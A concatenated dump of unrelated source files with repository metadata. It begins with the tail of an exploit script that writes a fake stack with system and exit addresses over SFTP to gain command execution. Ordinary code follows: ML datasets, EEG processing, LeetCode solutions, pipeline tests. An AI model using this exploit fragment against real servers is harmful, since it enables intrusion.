        new_stack += p64(sys_addr)
        new_stack += p64(exit_addr)
    # debug info
    with open("fake_stack","w") as lg:
        lg.write(new_stack)
    # write cmd to top off the stack
    f.seek(saddr_start)
    f.write(cmd + "\x00")
    # write the rest from bottom up, we're going to crash at some point
    for off in range(stack_size - 32000, 0, -32000):
        cur_addr = saddr_start + off
        try:
            f.seek(cur_addr)
            f.write(new_stack[off:off+32000])
        except:
            print "Stack write failed - that's probably good!"
            print "Check if you command was executed..."
            sys.exit(0)

sftp.close()
ssh.close()
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
09afd1ec9f2a9c10b008d929da2e7cdaf0b635c1 | fb1e852da0a026fb59c8cb24aeb40e62005501f1 | /edgelm/examples/wav2vec/unsupervised/data/extracted_features_dataset.py | de470ddc318a5b817f42a7a595ab91eef4ded58e | [
"LGPL-2.1-or-later",
"LicenseRef-scancode-free-unknown",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | microsoft/unilm | 134aa44867c5ed36222220d3f4fd9616d02db573 | b60c741f746877293bb85eed6806736fc8fa0ffd | refs/heads/master | 2023-08-31T04:09:05.779071 | 2023-08-29T14:07:57 | 2023-08-29T14:07:57 | 198,350,484 | 15,313 | 2,192 | MIT | 2023-08-19T11:33:20 | 2019-07-23T04:15:28 | Python | UTF-8 | Python | false | false | 4,314 | py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import os
import contextlib
import numpy as np
import torch
from fairseq.data import FairseqDataset, data_utils
logger = logging.getLogger(__name__)
class ExtractedFeaturesDataset(FairseqDataset):
    """Dataset over pre-extracted speech features stored as one memory-mapped
    ``.npy`` matrix plus a ``.lengths`` file of per-utterance frame counts.
    Optionally pairs each kept utterance with labels from ``<split>.<labels>``.
    """

    def __init__(
        self,
        path,
        split,
        min_length=3,
        max_length=None,
        labels=None,
        label_dict=None,
        shuffle=True,
        sort_by_length=True,
    ):
        super().__init__()

        self.min_length = min_length
        self.max_length = max_length
        self.shuffle = shuffle
        self.sort_by_length = sort_by_length
        self.label_dict = label_dict

        if labels is not None:
            assert label_dict is not None

        self.sizes = []
        self.offsets = []
        self.labels = []

        path = os.path.join(path, split)
        data_path = path
        # mmap keeps the (potentially huge) feature matrix on disk.
        self.data = np.load(data_path + ".npy", mmap_mode="r")

        offset = 0
        skipped = 0

        if not os.path.exists(path + f".{labels}"):
            labels = None

        # ExitStack is a no-op stand-in when there is no label file to open.
        with open(data_path + ".lengths", "r") as len_f, open(
            path + f".{labels}", "r"
        ) if labels is not None else contextlib.ExitStack() as lbl_f:
            for line in len_f:
                length = int(line.rstrip())
                lbl = None if labels is None else next(lbl_f).rstrip().split()
                # Keep only utterances inside the [min_length, max_length] window.
                if length >= min_length and (
                    max_length is None or length <= max_length
                ):
                    self.sizes.append(length)
                    self.offsets.append(offset)
                    if lbl is not None:
                        self.labels.append(lbl)
                # Offsets advance over every utterance, kept or skipped.
                offset += length

        self.sizes = np.asarray(self.sizes)
        self.offsets = np.asarray(self.offsets)

        logger.info(f"loaded {len(self.offsets)}, skipped {skipped} samples")

    def __getitem__(self, index):
        offset = self.offsets[index]
        end = self.sizes[index] + offset
        # Copy the mmap'd slice so the resulting tensor owns its memory.
        feats = torch.from_numpy(self.data[offset:end].copy()).float()

        res = {"id": index, "features": feats}
        if len(self.labels) > 0:
            res["target"] = self.label_dict.encode_line(
                self.labels[index],
                line_tokenizer=lambda x: x,
                append_eos=False,
            )

        return res

    def __len__(self):
        return len(self.sizes)

    def collater(self, samples):
        # Right-pad features to the longest sample; padding_mask is True on pad.
        if len(samples) == 0:
            return {}

        features = [s["features"] for s in samples]
        sizes = [len(s) for s in features]

        target_size = max(sizes)

        collated_features = features[0].new_zeros(
            len(features), target_size, features[0].size(-1)
        )
        padding_mask = torch.BoolTensor(collated_features.shape[:-1]).fill_(False)
        for i, (f, size) in enumerate(zip(features, sizes)):
            collated_features[i, :size] = f
            padding_mask[i, size:] = True

        res = {
            "id": torch.LongTensor([s["id"] for s in samples]),
            "net_input": {"features": collated_features, "padding_mask": padding_mask},
        }

        if len(self.labels) > 0:
            target = data_utils.collate_tokens(
                [s["target"] for s in samples],
                pad_idx=self.label_dict.pad(),
                left_pad=False,
            )
            res["target"] = target

        return res

    def num_tokens(self, index):
        return self.size(index)

    def size(self, index):
        return self.sizes[index]

    def ordered_indices(self):
        """Return an ordered list of indices. Batches will be constructed based
        on this order."""
        if self.shuffle:
            order = [np.random.permutation(len(self))]
        else:
            order = [np.arange(len(self))]

        if self.sort_by_length:
            # lexsort uses the LAST key first, so this sorts by size with the
            # shuffled/arange order as tie-breaker; [::-1] puts longest first.
            order.append(self.sizes)
            return np.lexsort(order)[::-1]
        else:
            return order[0]
| [
"tage@sandbox12.t0ekrjpotp2uhbmhwy0wiwkeya.xx.internal.cloudapp.net"
] | tage@sandbox12.t0ekrjpotp2uhbmhwy0wiwkeya.xx.internal.cloudapp.net |
d4839e5d1454adf699dbf34d35ca809c5556285a | 9d13010b35a14c7c9ba55e704c76777f3f380885 | /demo1_sigpro_old.py | 3cff8956f97cf7dfd5507344169e3653f5c95022 | [] | no_license | trzp/BCIpf | 20e5732025bd604c67001c6dc65b479686187646 | fc4d1262b3e286bfde046fbfe5f71f73e6fa4395 | refs/heads/master | 2020-07-26T18:32:04.473503 | 2020-07-23T14:14:45 | 2020-07-23T14:14:45 | 208,733,546 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,587 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/9/18 9:52
# @Version : 1.0
# @File : demo1_sigpro.py
# @Author : Jingsheng Tang
# @Version : 1.0
# @Contact : mrtang@nudt.edu.cn mrtang_cs@163.com
# @License : (C) All Rights Reserved
from sigpro import SigPro
from sigpro import DefaultCoder
from scipy import signal as scipy_signal
import json
from cca import *
import time
class SigProApp(SigPro):
    """EEG signal processor: buffers incoming data on command, band-pass
    filters it, and picks the stimulus frequency in self.ff whose CCA
    reference signals correlate best (SSVEP-style detection — presumably;
    confirm against the paradigm this demo drives)."""

    def __init__(self, configs_path='./config.js'):
        super(SigProApp, self).__init__(configs_path)
        self.CODER = DefaultCoder()
        self.data = []          # buffered EEG chunks while accdata is True
        self.accdata = False    # currently accumulating data?
        self.calres = False     # classify on the next process() call?
        with open(configs_path,'r') as f:
            self.configs = json.loads(f.read())
        Fs = self.configs['signal_processing']['samplingrate']
        fs = Fs / 2
        # Chebyshev-I band-pass: pass 5-45 Hz, stop below 3 / above 48 Hz.
        Wp = [5 / fs, 45 / fs]
        Ws = [3 / fs, 48 / fs]
        [N, Wn] = scipy_signal.cheb1ord(Wp, Ws, 4, 20)
        [self.f_b, self.f_a] = scipy_signal.cheby1(N, 0.5, Wn, btype='bandpass')
        # Candidate frequencies with sin/cos references at the fundamental
        # and double frequency, 20 s long at the sampling rate.
        self.ff = [8, 9, 11, 12]
        t = np.arange(0, 20, 1. / Fs)
        self.sx = []
        for f in self.ff:
            x1 = np.mat(np.sin(2 * np.pi * f * t))
            x2 = np.mat(np.cos(2 * np.pi * f * t))
            x3 = np.mat(np.sin(4 * np.pi * f * t))
            x4 = np.mat(np.cos(4 * np.pi * f * t))
            x = np.vstack([x1, x2, x3, x4])
            self.sx.append(x)

    def process(self, eeg, marker):
        """Handle one chunk: marker value 1 starts accumulation, 2 requests
        classification. Returns 1 when a result was produced, else 0."""
        if len(marker)>0:
            print(marker)
            if marker['process']['value'][0] == 1:
                self.accdata = True
            elif marker['process']['value'][0] == 2:
                self.calres = True
                self.accdata = False
            else:
                pass
        if self.accdata:
            self.data.append(eeg)
        if self.calres:
            fff = time.clock()
            if len(self.data) == 0:
                return 0
            dd = np.hstack(self.data)
            datafilt = scipy_signal.filtfilt(self.f_b, self.f_a, dd)  # band-pass filter
            ll = datafilt.shape[1]
            relate = []
            for x in self.sx:
                # CCA against each frequency's references, truncated to the
                # recorded length; keep the strongest canonical correlation.
                a,b,r = cca(x[:,:ll],datafilt)
                relate.append(np.max(r))
            indx = np.argmax(relate)
            self.RESULT = self.ff[indx]
            print(self.RESULT)
            self.data = []
            self.calres = False
            print(time.clock()-fff,'??')
            return 1
        return 0
return 0
def main():
    # Build the signal processor and start its run loop.
    sp = SigProApp()
    sp.start_run()


if __name__ == '__main__':
    main()
| [
"mrtang@nudt.edu.cn"
] | mrtang@nudt.edu.cn |
bbb0735de098f944fb96c589c586fb888bcbabb4 | ba2dbc19e899faaa17b994a1224e455a3de5b9ad | /02 Data Science/1. Collection/1. Format_practice/1. XML/329_3.py | 69ae0e4d1d52868338c053f454ecd5cd50dd8f66 | [] | no_license | xsky21/bigdata2019 | 52d3dc9379a05ba794c53a28284de2168d0fc366 | 19464a6f8862b6e6e3d4e452e0dab85bdd954e40 | refs/heads/master | 2020-04-21T10:56:34.637812 | 2019-04-16T04:16:27 | 2019-04-16T04:16:27 | 169,503,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | from xml.etree.ElementTree import Element,dump,SubElement
# Build a <note date="20120104"> element; setting the attribute afterwards
# yields the same result as passing it as a keyword/attrib at construction.
note = Element('note')
note.set('date', '20120104')

# Child node <to>Tove</to>, created and attached explicitly.
to = Element('to')
to.text = 'Tove'
note.append(to)

# SubElement both creates and attaches <from_tag>Jani</from_tag> in one call.
SubElement(note, 'from_tag').text = 'Jani'

dump(note)
| [
"studerande5@gmail.com"
] | studerande5@gmail.com |
5ff2bca4503ea9f750bdf2e9302a68d044f31976 | acd41dc7e684eb2e58b6bef2b3e86950b8064945 | /res/packages/scripts/scripts/client/gui/Scaleform/genConsts/ACHIEVEMENTS_ALIASES.py | a1ac9cb63c4d955caad56510b952f353f13adbe0 | [] | no_license | webiumsk/WoT-0.9.18.0 | e07acd08b33bfe7c73c910f5cb2a054a58a9beea | 89979c1ad547f1a1bbb2189f5ee3b10685e9a216 | refs/heads/master | 2021-01-20T09:37:10.323406 | 2017-05-04T13:51:43 | 2017-05-04T13:51:43 | 90,268,530 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 668 | py | # 2017.05.04 15:24:50 Střední Evropa (letní čas)
# Embedded file name: scripts/client/gui/Scaleform/genConsts/ACHIEVEMENTS_ALIASES.py
class ACHIEVEMENTS_ALIASES(object):
    """
    DO NOT MODIFY!
    Generated with yaml.
    __author__ = 'yaml_processor'
    """
    # Flash UI linkage names for the achievement counter widgets.
    GREY_COUNTER = 'GreyCounter_UI'
    YELLOW_COUNTER = 'YellowCounter_UI'
    RED_COUNTER = 'RedCounter_UI'
    BEIGE_COUNTER = 'BeigeCounter_UI'
# okay decompyling C:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\client\gui\Scaleform\genConsts\ACHIEVEMENTS_ALIASES.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.05.04 15:24:50 Střední Evropa (letní čas)
| [
"info@webium.sk"
] | info@webium.sk |
758a84fd0672f8afe1f8b3219aa65bafbbec84ef | f0e25779a563c2d570cbc22687c614565501130a | /LeetCode/Stack/739_daily_temperatures.py | eb4e5e5065af97f3fce52ffc691277a8b67a24e6 | [] | no_license | XyK0907/for_work | 8dcae9026f6f25708c14531a83a6593c77b38296 | 85f71621c54f6b0029f3a2746f022f89dd7419d9 | refs/heads/master | 2023-04-25T04:18:44.615982 | 2021-05-15T12:10:26 | 2021-05-15T12:10:26 | 293,845,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,059 | py | class Solution(object):
def dailyTemperatures(self, T):
"""
Time O(n)
Space O(W) W is the number of allowed values for T[i]
:type T: List[int]
:rtype: List[int]
"""
length = len(T)
res = [0] * length
stack = []
for i in range(length):
while stack and T[stack[-1]] < T[i]:
prev_idx = stack.pop()
res[prev_idx] = i - prev_idx
stack.append(i)
return res
def dailyTemperatures_another(self, T):
"""
:type T: List[int]
:rtype: List[int]
"""
length = len(T)
res = [0] * length
stack = []
for i in range(length - 1, -1, -1):
while stack and T[stack[-1]] <= T[i]:
stack.pop()
if stack:
res[i] = stack[-1] - i
stack.append(i)
return res
if __name__ == '__main__':
    # Quick manual check; expected output: [1, 1, 4, 2, 1, 1, 0, 0]
    solution = Solution()
    print(solution.dailyTemperatures_another(T = [73, 74, 75, 71, 69, 72, 76, 73]))
"cherry.kong0907@gmail.com"
] | cherry.kong0907@gmail.com |
680928b2ad532848f8dc1b18f365d874146fd9e7 | ff5d91e9eee4dd41e85d418120f11daec71cf93b | /2011/nazionali/scuola/gen/generatore.py | 99b8f8ad290fc1d89238d99730ffe88c4278e660 | [] | no_license | olimpiadi-informatica/oii | d0023c5fa00100cadc6a13b1e153fca0017177ca | ce6bc7e8b40a32c01611f4b20ee72f8a9318eafd | refs/heads/master | 2021-05-16T02:35:15.742339 | 2020-03-14T21:56:18 | 2020-03-14T21:56:18 | 28,759,072 | 31 | 6 | null | 2019-12-15T12:37:53 | 2015-01-04T00:55:52 | C++ | UTF-8 | Python | false | false | 508 | py | #!/usr/bin/env python2
from limiti import *
usage="""Generatore per "scuola".
Parametri:
* N (numero di eroi)
* P (tipo di prova)
Constraint:
* 1 <= N < %d
* P == 1 || P == 2
* P == 2 => N = 2^n
""" % MAXN
from sys import argv, exit, stderr
import os
from numpy.random import seed, random, randint
from random import choice, sample
def run(N, S):
    # NOTE(review): the second parameter is named S but is never used; the
    # body prints the module-global P bound in the __main__ block below.
    print N, P
if __name__ == "__main__":
    if len(argv) != 3:
        print usage
        exit(1)
    # Both CLI arguments are integers: N (number of heroes), P (trial type).
    N, P = [int(x) for x in argv[1:]]
    run(N, P)
| [
"williamdiluigi@gmail.com"
] | williamdiluigi@gmail.com |
898bfbc18f1fc8480db3c2f533cd9d6fb01c31cf | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02556/s103128743.py | c6fdb69398ed5464103d08827a895a139796cf40 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 673 | py | import sys
input=sys.stdin.buffer.readline
#sys.setrecursionlimit(10**9)
#from functools import lru_cache
def RD(): return sys.stdin.read()
def II(): return int(input())
def MI(): return map(int,input().split())
def MF(): return map(float,input().split())
def LI(): return list(map(int,input().split()))
def LF(): return list(map(float,input().split()))
def TI(): return tuple(map(int,input().split()))
# rstrip().decode('utf-8')
def main():
n=II()
XY=[LI() for _ in range(n)]
A=[]
B=[]
for x,y in XY:
A.append(x+y)
B.append(x-y)
A.sort()
B.sort()
a=A[-1]-A[0]
b=B[-1]-B[0]
print(max(a,b))
if __name__=="__main__":
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
2f530cb3eda17fc6b071b7ae0c313d303a5c766e | 725ac5a0bf72829be627bf8dc82fdc51ba0f94ae | /Text_Classification/Fasttext/step1_get_data_to_examples.py | 55cc1e4866d8e585585ad74b7ba4095138ea7202 | [] | no_license | shawroad/NLP_pytorch_project | fa14b6e4a156229765e1d552901d0492d8e1def3 | 1272fed2dc8fef78a9ded0f1ae1644d613a3b57b | refs/heads/master | 2023-06-25T02:37:35.503251 | 2023-06-12T10:57:11 | 2023-06-12T10:57:11 | 229,694,655 | 530 | 104 | null | 2020-12-08T09:21:47 | 2019-12-23T06:54:29 | Python | UTF-8 | Python | false | false | 2,660 | py | # -*- encoding: utf-8 -*-
'''
@File : construct_data.py
@Time : 2020/11/04 13:49:38
@Author : xiaolu
@Contact : luxiaonlp@163.com
'''
import gzip
import pickle
import json
import jieba
from tqdm import tqdm
import random
class RankExample(object):
    """One (question, candidate document) ranking example.

    label is 1 when the document body contains the answer span, 0 otherwise;
    answer/label/keywords are optional at construction time.
    """

    def __init__(self,
                 doc_id,
                 question_text,
                 context,
                 answer=None,
                 label=None,
                 keywords=None
                 ):
        self.doc_id = doc_id
        self.question_text = question_text
        self.context = context
        self.answer = answer
        self.label = label          # 1 = context contains answer, 0 = not
        self.keywords = keywords    # keywords extracted from the document

    def __str__(self):
        return self.__repr__()

    def __repr__(self):
        # Use %s for label: the previous %d raised TypeError for the default
        # label=None, while %s prints identically for integer labels.
        s = ""
        s += "doc_id: %s" % (str(self.doc_id))
        s += ", question_text: %s" % (self.question_text)
        s += ", context: %s" % (self.context)
        s += ", answer: %s" % (self.answer)
        s += ", label: %s" % (self.label)
        s += ", keyword: {}".format(self.keywords)
        return s
def construct(data):
    """Flatten QA items into RankExamples: one per (question, related doc),
    labelled 1 when the doc body contains the answer string, else 0."""
    doc_id = 0
    examples = []
    pos_sample = 0
    neg_sample = 0
    for item in tqdm(data):
        question = item['question']
        answer = item['answer']
        related_doc = item['related_doc']
        if len(related_doc) == 0:
            continue
        for doc in related_doc:
            doc_id += 1
            text = doc['body']
            keywords = doc['keywords']
            # Substring match decides the positive/negative label.
            if text.find(answer) != -1:
                pos_sample += 1
                examples.append(RankExample(doc_id=doc_id, question_text=question, context=text, answer=answer, label=1, keywords=keywords))
            else:
                neg_sample += 1
                examples.append(RankExample(doc_id=doc_id, question_text=question, context=text, answer=answer, label=0, keywords=keywords))
    print('正样本个数:', pos_sample)  # positive count: 48611 (train) / 12324 (dev)
    print('负样本个数:', neg_sample)  # negative count: 692525 (train) / 170526 (dev)
    # train set pos:neg = 48611:692525
    # dev set pos:neg = 12324:170526
    return examples
if __name__ == '__main__':
    # Load the raw QA splits, flatten them into ranking examples, and cache
    # the results as gzipped pickles for the training pipeline.
    train_data = json.load(open('./data/train_policy.json', 'r', encoding='utf8'))
    dev_data = json.load(open('./data/dev_policy.json', 'r', encoding='utf8'))
    train_examples = construct(train_data)
    with gzip.open('./data/train_examples.pkl.gz', 'wb') as fout:
        pickle.dump(train_examples, fout)
    dev_examples = construct(dev_data)
    with gzip.open('./data/dev_examples.pkl.gz', 'wb') as fout:
        pickle.dump(dev_examples, fout)
| [
"luxiaonlp@163.com"
] | luxiaonlp@163.com |
3fb5e7917f3a7f42b3b3e6a4fe1551923b895957 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/303/usersdata/302/69507/submittedfiles/testes.py | 41b941ca1b9f17291580bab0acaa2052cb564863 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | n = float(input('Digite o número de lados do polígono'))
if n<=2:
    # A polygon needs at least 3 sides.
    print('Isso não é um polígono')
elif n>2:
    # Number of diagonals of an n-gon: n*(n-3)/2.
    nd = ((n*(n-3))/2)
    print (nd)
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
aeea0b4cae09144645d7594a809090b801476613 | ff0cdf438fbc202fe621ed90472ce9d93acd383b | /make_pdf/make_pptx.py | 5251fe6e6c2bf2f5c3f305315d2c331c53d5a3b9 | [
"MIT",
"Apache-2.0"
] | permissive | nishio/idea-generation | e0284f34ebb163660f6b5d45963a8528f4eb3cb4 | 7d7fa08456243dc63c9c80d15244f39b73814ad9 | refs/heads/master | 2021-11-10T08:33:13.597884 | 2021-10-24T03:51:12 | 2021-10-24T03:51:12 | 12,247,640 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,825 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
テキストをpptxにする
改行位置制御や図を貼りたいなどの細かいニーズに答えるのは
ユーザの手元のPowerPointでやってもらおうという発想
"""
import argparse
from pptx import Presentation
from pptx.util import Inches, Pt, Cm
from pptx.enum.text import MSO_AUTO_SIZE, PP_ALIGN, MSO_ANCHOR
def main():
    """CLI entry point: read slide texts (one per line) from stdin, or
    generate test slides with --test."""
    parser = argparse.ArgumentParser(description='Text to PPTX.')
    parser.add_argument('--test', action='store_true')
    args = parser.parse_args()
    if args.test:
        # Self-test: slides of 1..100 'あ' characters to exercise font sizing.
        texts = ['あ' * x for x in range(1, 101)]
    else:
        import sys
        texts = sys.stdin.read().split('\n')
    make_pptx(texts)
def find_best_fontsize(text):
    """Pick a font size (pt) so the text fills one slide.

    Width is estimated in full-width character units: Shift-JIS encodes
    double-width characters as 2 bytes, so byte-length / 2 approximates the
    display width. NOTE(review): Python 2 only (str.decode, int division).
    """
    # Sizes for 0..3 full-width characters.
    sizes = [415, 415, 346, 240]
    chars = len(text.decode('utf-8').encode('sjis')) / 2
    if chars < len(sizes):
        return sizes[chars]
    # means 'if chars leq 6 (2 * 3), fontsize is 200pt'
    # (limits are rows * columns that fit on a slide at that size)
    sizes = [
        (2 * 3, 200), (2 * 4, 167), (3 * 4, 159),
        (3 * 5, 125), (4 * 6, 110), (5 * 8, 90),
        (5 * 9, 80), (6 * 10, 70), (7 * 14, 60),
    ]
    for lim, siz in sizes:
        if chars <= lim:
            return siz
    # Anything longer gets the minimum size.
    return 50
def make_pptx(texts):
    """Write test.pptx with one centered, auto-sized text slide per entry."""
    prs = Presentation()
    for text in texts:
        # Layout 6 is the blank layout in the default template.
        blank_slide_layout = prs.slide_layouts[6]
        slide = prs.slides.add_slide(blank_slide_layout)
        # Full-bleed text box covering a 25.4 x 19.1 cm (4:3) slide.
        txBox = slide.shapes.add_textbox(0, 0, Cm(25.4), Cm(19.1))
        tf = txBox.textframe
        tf.auto_size = MSO_AUTO_SIZE.TEXT_TO_FIT_SHAPE
        tf.word_wrap = True
        tf.vertical_anchor = MSO_ANCHOR.MIDDLE
        p = tf.paragraphs[0]
        p.text = text
        p.font.size = Pt(find_best_fontsize(text))
        p.alignment = PP_ALIGN.CENTER
    prs.save('test.pptx')


if __name__ == '__main__':
    main()
| [
"nishio.hirokazu@gmail.com"
] | nishio.hirokazu@gmail.com |
6d57d337bb381af4b0baadbe7ffb9536a14c12ee | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/bob/89f5b02f9e63478881ea0f0106bf295d.py | aefb9d4b1561027d8513e1650a48c28554dd61ce | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 457 | py | import string
def hey(input_text):
if is_all_caps(input_text):
return "Woah, chill out!"
if is_question(input_text):
return "Sure."
if is_empty(input_text):
return "Fine. Be that way!"
return "Whatever."
def is_question(input_text):
return input_text.endswith("?")
def is_empty(input_text):
return string.strip(input_text) == ''
def is_all_caps(input_text):
return input_text.isupper()
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
1c5b53877ed351ea56b9e794d857dd6c10d9c66c | 76dcba11031090ac69dee281ef18ae98cdd43ff9 | /IssueTrackerProduct/I18N.py | ba3cc3b59a2ebd0d8f45b768dd3c33b82cdab7ce | [] | no_license | sureshvv/IssueTrackerProduct | 137b34a3123ea8823af18aa9c0161dad840b93da | 817820377288330f9e318428cd743659476e625d | refs/heads/master | 2021-01-18T11:22:46.844607 | 2014-04-21T17:15:58 | 2014-04-21T17:15:58 | 1,546,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | #try:
# from Products.PlacelessTranslationService.MessageID import MessageIDFactory
# _ = MessageIDFactory('itp')
#except ImportError:
# def _(s):
# return s
def _(s, *a, **k):
    # Fallback gettext-style translator: PlacelessTranslationService is not
    # imported (see commented block above), so return the message unchanged
    # and ignore any extra positional/keyword arguments.
    return s
"mail@peterbe.com"
] | mail@peterbe.com |
59682c24e6d34e0adc8df231f18c615f80f35d74 | 6d1016e97e02343b8d85ddbd5f5d1406261eabfd | /test/view_helpers/Test_DataTable_Js_Views.py | a4659e5a5f0be0edb2d6aa97169f679f20c61858 | [
"Apache-2.0"
] | permissive | MaeveScarryPBX/serverless-render | 1c2c2dbf228e5fb69d67d7acd89bf5a49fc69087 | 44365e7e0ab6e04fb304a7091ceeab41f67d8d88 | refs/heads/master | 2020-04-29T05:05:47.078806 | 2019-03-14T21:29:12 | 2019-03-14T21:29:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,527 | py | from unittest import TestCase
from browser.Browser_Lamdba_Helper import Browser_Lamdba_Helper
from view_helpers.DataTable_Js_Views import DataTable_Js_Views
class Test_DataTable_Js_Views(TestCase):
    """Render the DataTable JS views and hand the resulting PNG bytes to the
    Lambda browser helper for saving after each test."""

    def setUp(self):
        self.graph_name = 'graph_XKW'
        self.png_data = None

    def tearDown(self):
        # Persist whatever screenshot the test produced (may be None).
        Browser_Lamdba_Helper().save_png_data(self.png_data)

    def test_graph(self):
        # Earlier assignments are kept as sample graph ids of varying size;
        # only the last one is used.
        graph_name = 'graph_XKW' # (7 nodes)
        graph_name = 'graph_MKF' # ( 20 nodes, 27 edges)
        #graph_name = 'graph_YT4' # (199 nodes, 236 edges)
        #graph_name = 'graph_VZ5' # (367 nodes, 653 edges)
        graph_name = 'graph_W4T' # R1 Labels (from search results)
        graph_name = 'graph_9CP'
        self.png_data = DataTable_Js_Views.graph(params=[graph_name])

    def test_graph_all_fields(self):
        graph_name = 'graph_XKW' # (7 nodes)
        #graph_name = 'graph_MKF' # ( 20 nodes, 27 edges)
        #graph_name = 'graph_YT4' # (199 nodes, 236 edges)
        #graph_name = 'graph_VZ5' # (367 nodes, 653 edges)
        self.png_data = DataTable_Js_Views.graph_all_fields(params=[graph_name])

    def graph_all_fields__issue_id(self):
        # Not auto-discovered (no test_ prefix) — invoked manually.
        graph_name = 'GSSP-111'
        self.png_data = DataTable_Js_Views.graph_all_fields(params=[graph_name])

    def test_issue(self):
        issue_id = 'GSSP-111'
        self.png_data = DataTable_Js_Views.issue(params=[issue_id])
def test_test_data(self):
self.png_data = DataTable_Js_Views.test_data() | [
"dinis.cruz@owasp.org"
] | dinis.cruz@owasp.org |
6a9b86aef458d8da67395ff229fdfb3f7fb9988e | c7e753eff114ea692057c406ff9ce2fe8a7c1adb | /tests/test_cmd.py | 931cbd54d7684c775e23d66ca5048858c5825b63 | [] | permissive | LSSTDESC/ceci | 67fa0df56dde8c61947e5d8c2a20796beaeeb422 | 5c683f8fd6a8bdd2b36c1f6f03f4d24599307a54 | refs/heads/master | 2023-09-01T08:05:04.830316 | 2023-08-02T12:47:49 | 2023-08-02T12:47:49 | 120,935,349 | 9 | 10 | BSD-3-Clause | 2023-08-23T12:46:07 | 2018-02-09T17:29:45 | Python | UTF-8 | Python | false | false | 3,158 | py | from ceci.pipeline import StageExecutionConfig
from ceci.sites.local import LocalSite
from ceci.sites.nersc import NerscBatchSite
import os
import pytest
class MockSite:
    """Minimal stand-in for a ceci site object: exposes only the config
    mapping that StageExecutionConfig reads image/volume from."""

    def __init__(self):
        self.config = dict(image="abc", volume="def")
def test_defaults():
    # With no per-stage overrides the execution config falls back to its
    # defaults, while image/volume come from the site's config (MockSite).
    sec = StageExecutionConfig({"name": "a", "site": MockSite()})
    assert sec.nodes == 1
    assert sec.nprocess == 1
    assert sec.threads_per_process == 1
    assert sec.mem_per_process == 2
    assert sec.image == "abc"
    assert sec.volume == "def"
def test_local():
    # Plain local execution: no container wrapper when no image is set.
    site = LocalSite({})
    sec = StageExecutionConfig({"name": "a", "site": site})
    cmd1 = "echo 1"
    # should not start with docker/shifter, since no image specified
    cmd = site.command(cmd1, sec)
    # don't want to test too specifically here, since it may change
    assert "docker" not in cmd
    assert "shifter" not in cmd
    assert "OMP_NUM_THREADS=1" in cmd
    assert cmd1 in cmd
def test_docker():
    # With an image configured, the local site wraps the command in
    # `docker run` with the volume mounted and mpirun for nprocess > 1.
    site = LocalSite({})
    sec = StageExecutionConfig(
        {
            "name": "a",
            "site": site,
            "image": "username/potato",
            "volume": "a:b",
            "threads_per_process": 4,
            "nprocess": 2,
        }
    )
    cmd1 = "echo 1"
    # should not start with docker/shifter, since no image specified
    cmd = site.command(cmd1, sec)
    # don't want to test too specifically here, since it may change
    assert "docker run" in cmd
    assert "username/potato" in cmd
    assert "-v a:b" in cmd
    assert "mpirun -n 2" in cmd
    assert "shifter" not in cmd
    assert "OMP_NUM_THREADS=4" in cmd
    assert cmd1 in cmd
def _test_nersc(job_id):
    """Build a NERSC batch command and check its shifter/srun structure.

    ``job_id`` controls whether SLURM_JOB_ID is present in the environment
    while the command is built; the variable is restored afterwards.
    """
    site = NerscBatchSite({})
    # Fake that we're running inside a SLURM job to avoid complaints.
    initial = os.environ.get("SLURM_JOB_ID")
    if job_id:
        os.environ["SLURM_JOB_ID"] = "fake_job_id"
    elif initial is not None:
        del os.environ["SLURM_JOB_ID"]
    try:
        sec = StageExecutionConfig(
            {
                "name": "a",
                "site": site,
                "image": "username/potato",
                "volume": "a:b",
                "threads_per_process": 4,
                "nprocess": 2,
                "nodes": 3,
            }
        )
        cmd1 = "echo 1"
        # An image IS configured here, so the command should be wrapped
        # in shifter with the srun launcher.
        cmd = site.command(cmd1, sec)
        # Don't test too specifically here, since formatting may change.
        assert "shifter" in cmd
        assert "--image username/potato" in cmd
        assert "-V a:b" in cmd
        assert "srun -u -n 2" in cmd
        assert "--env OMP_NUM_THREADS=4" in cmd
        assert "--nodes 3" in cmd
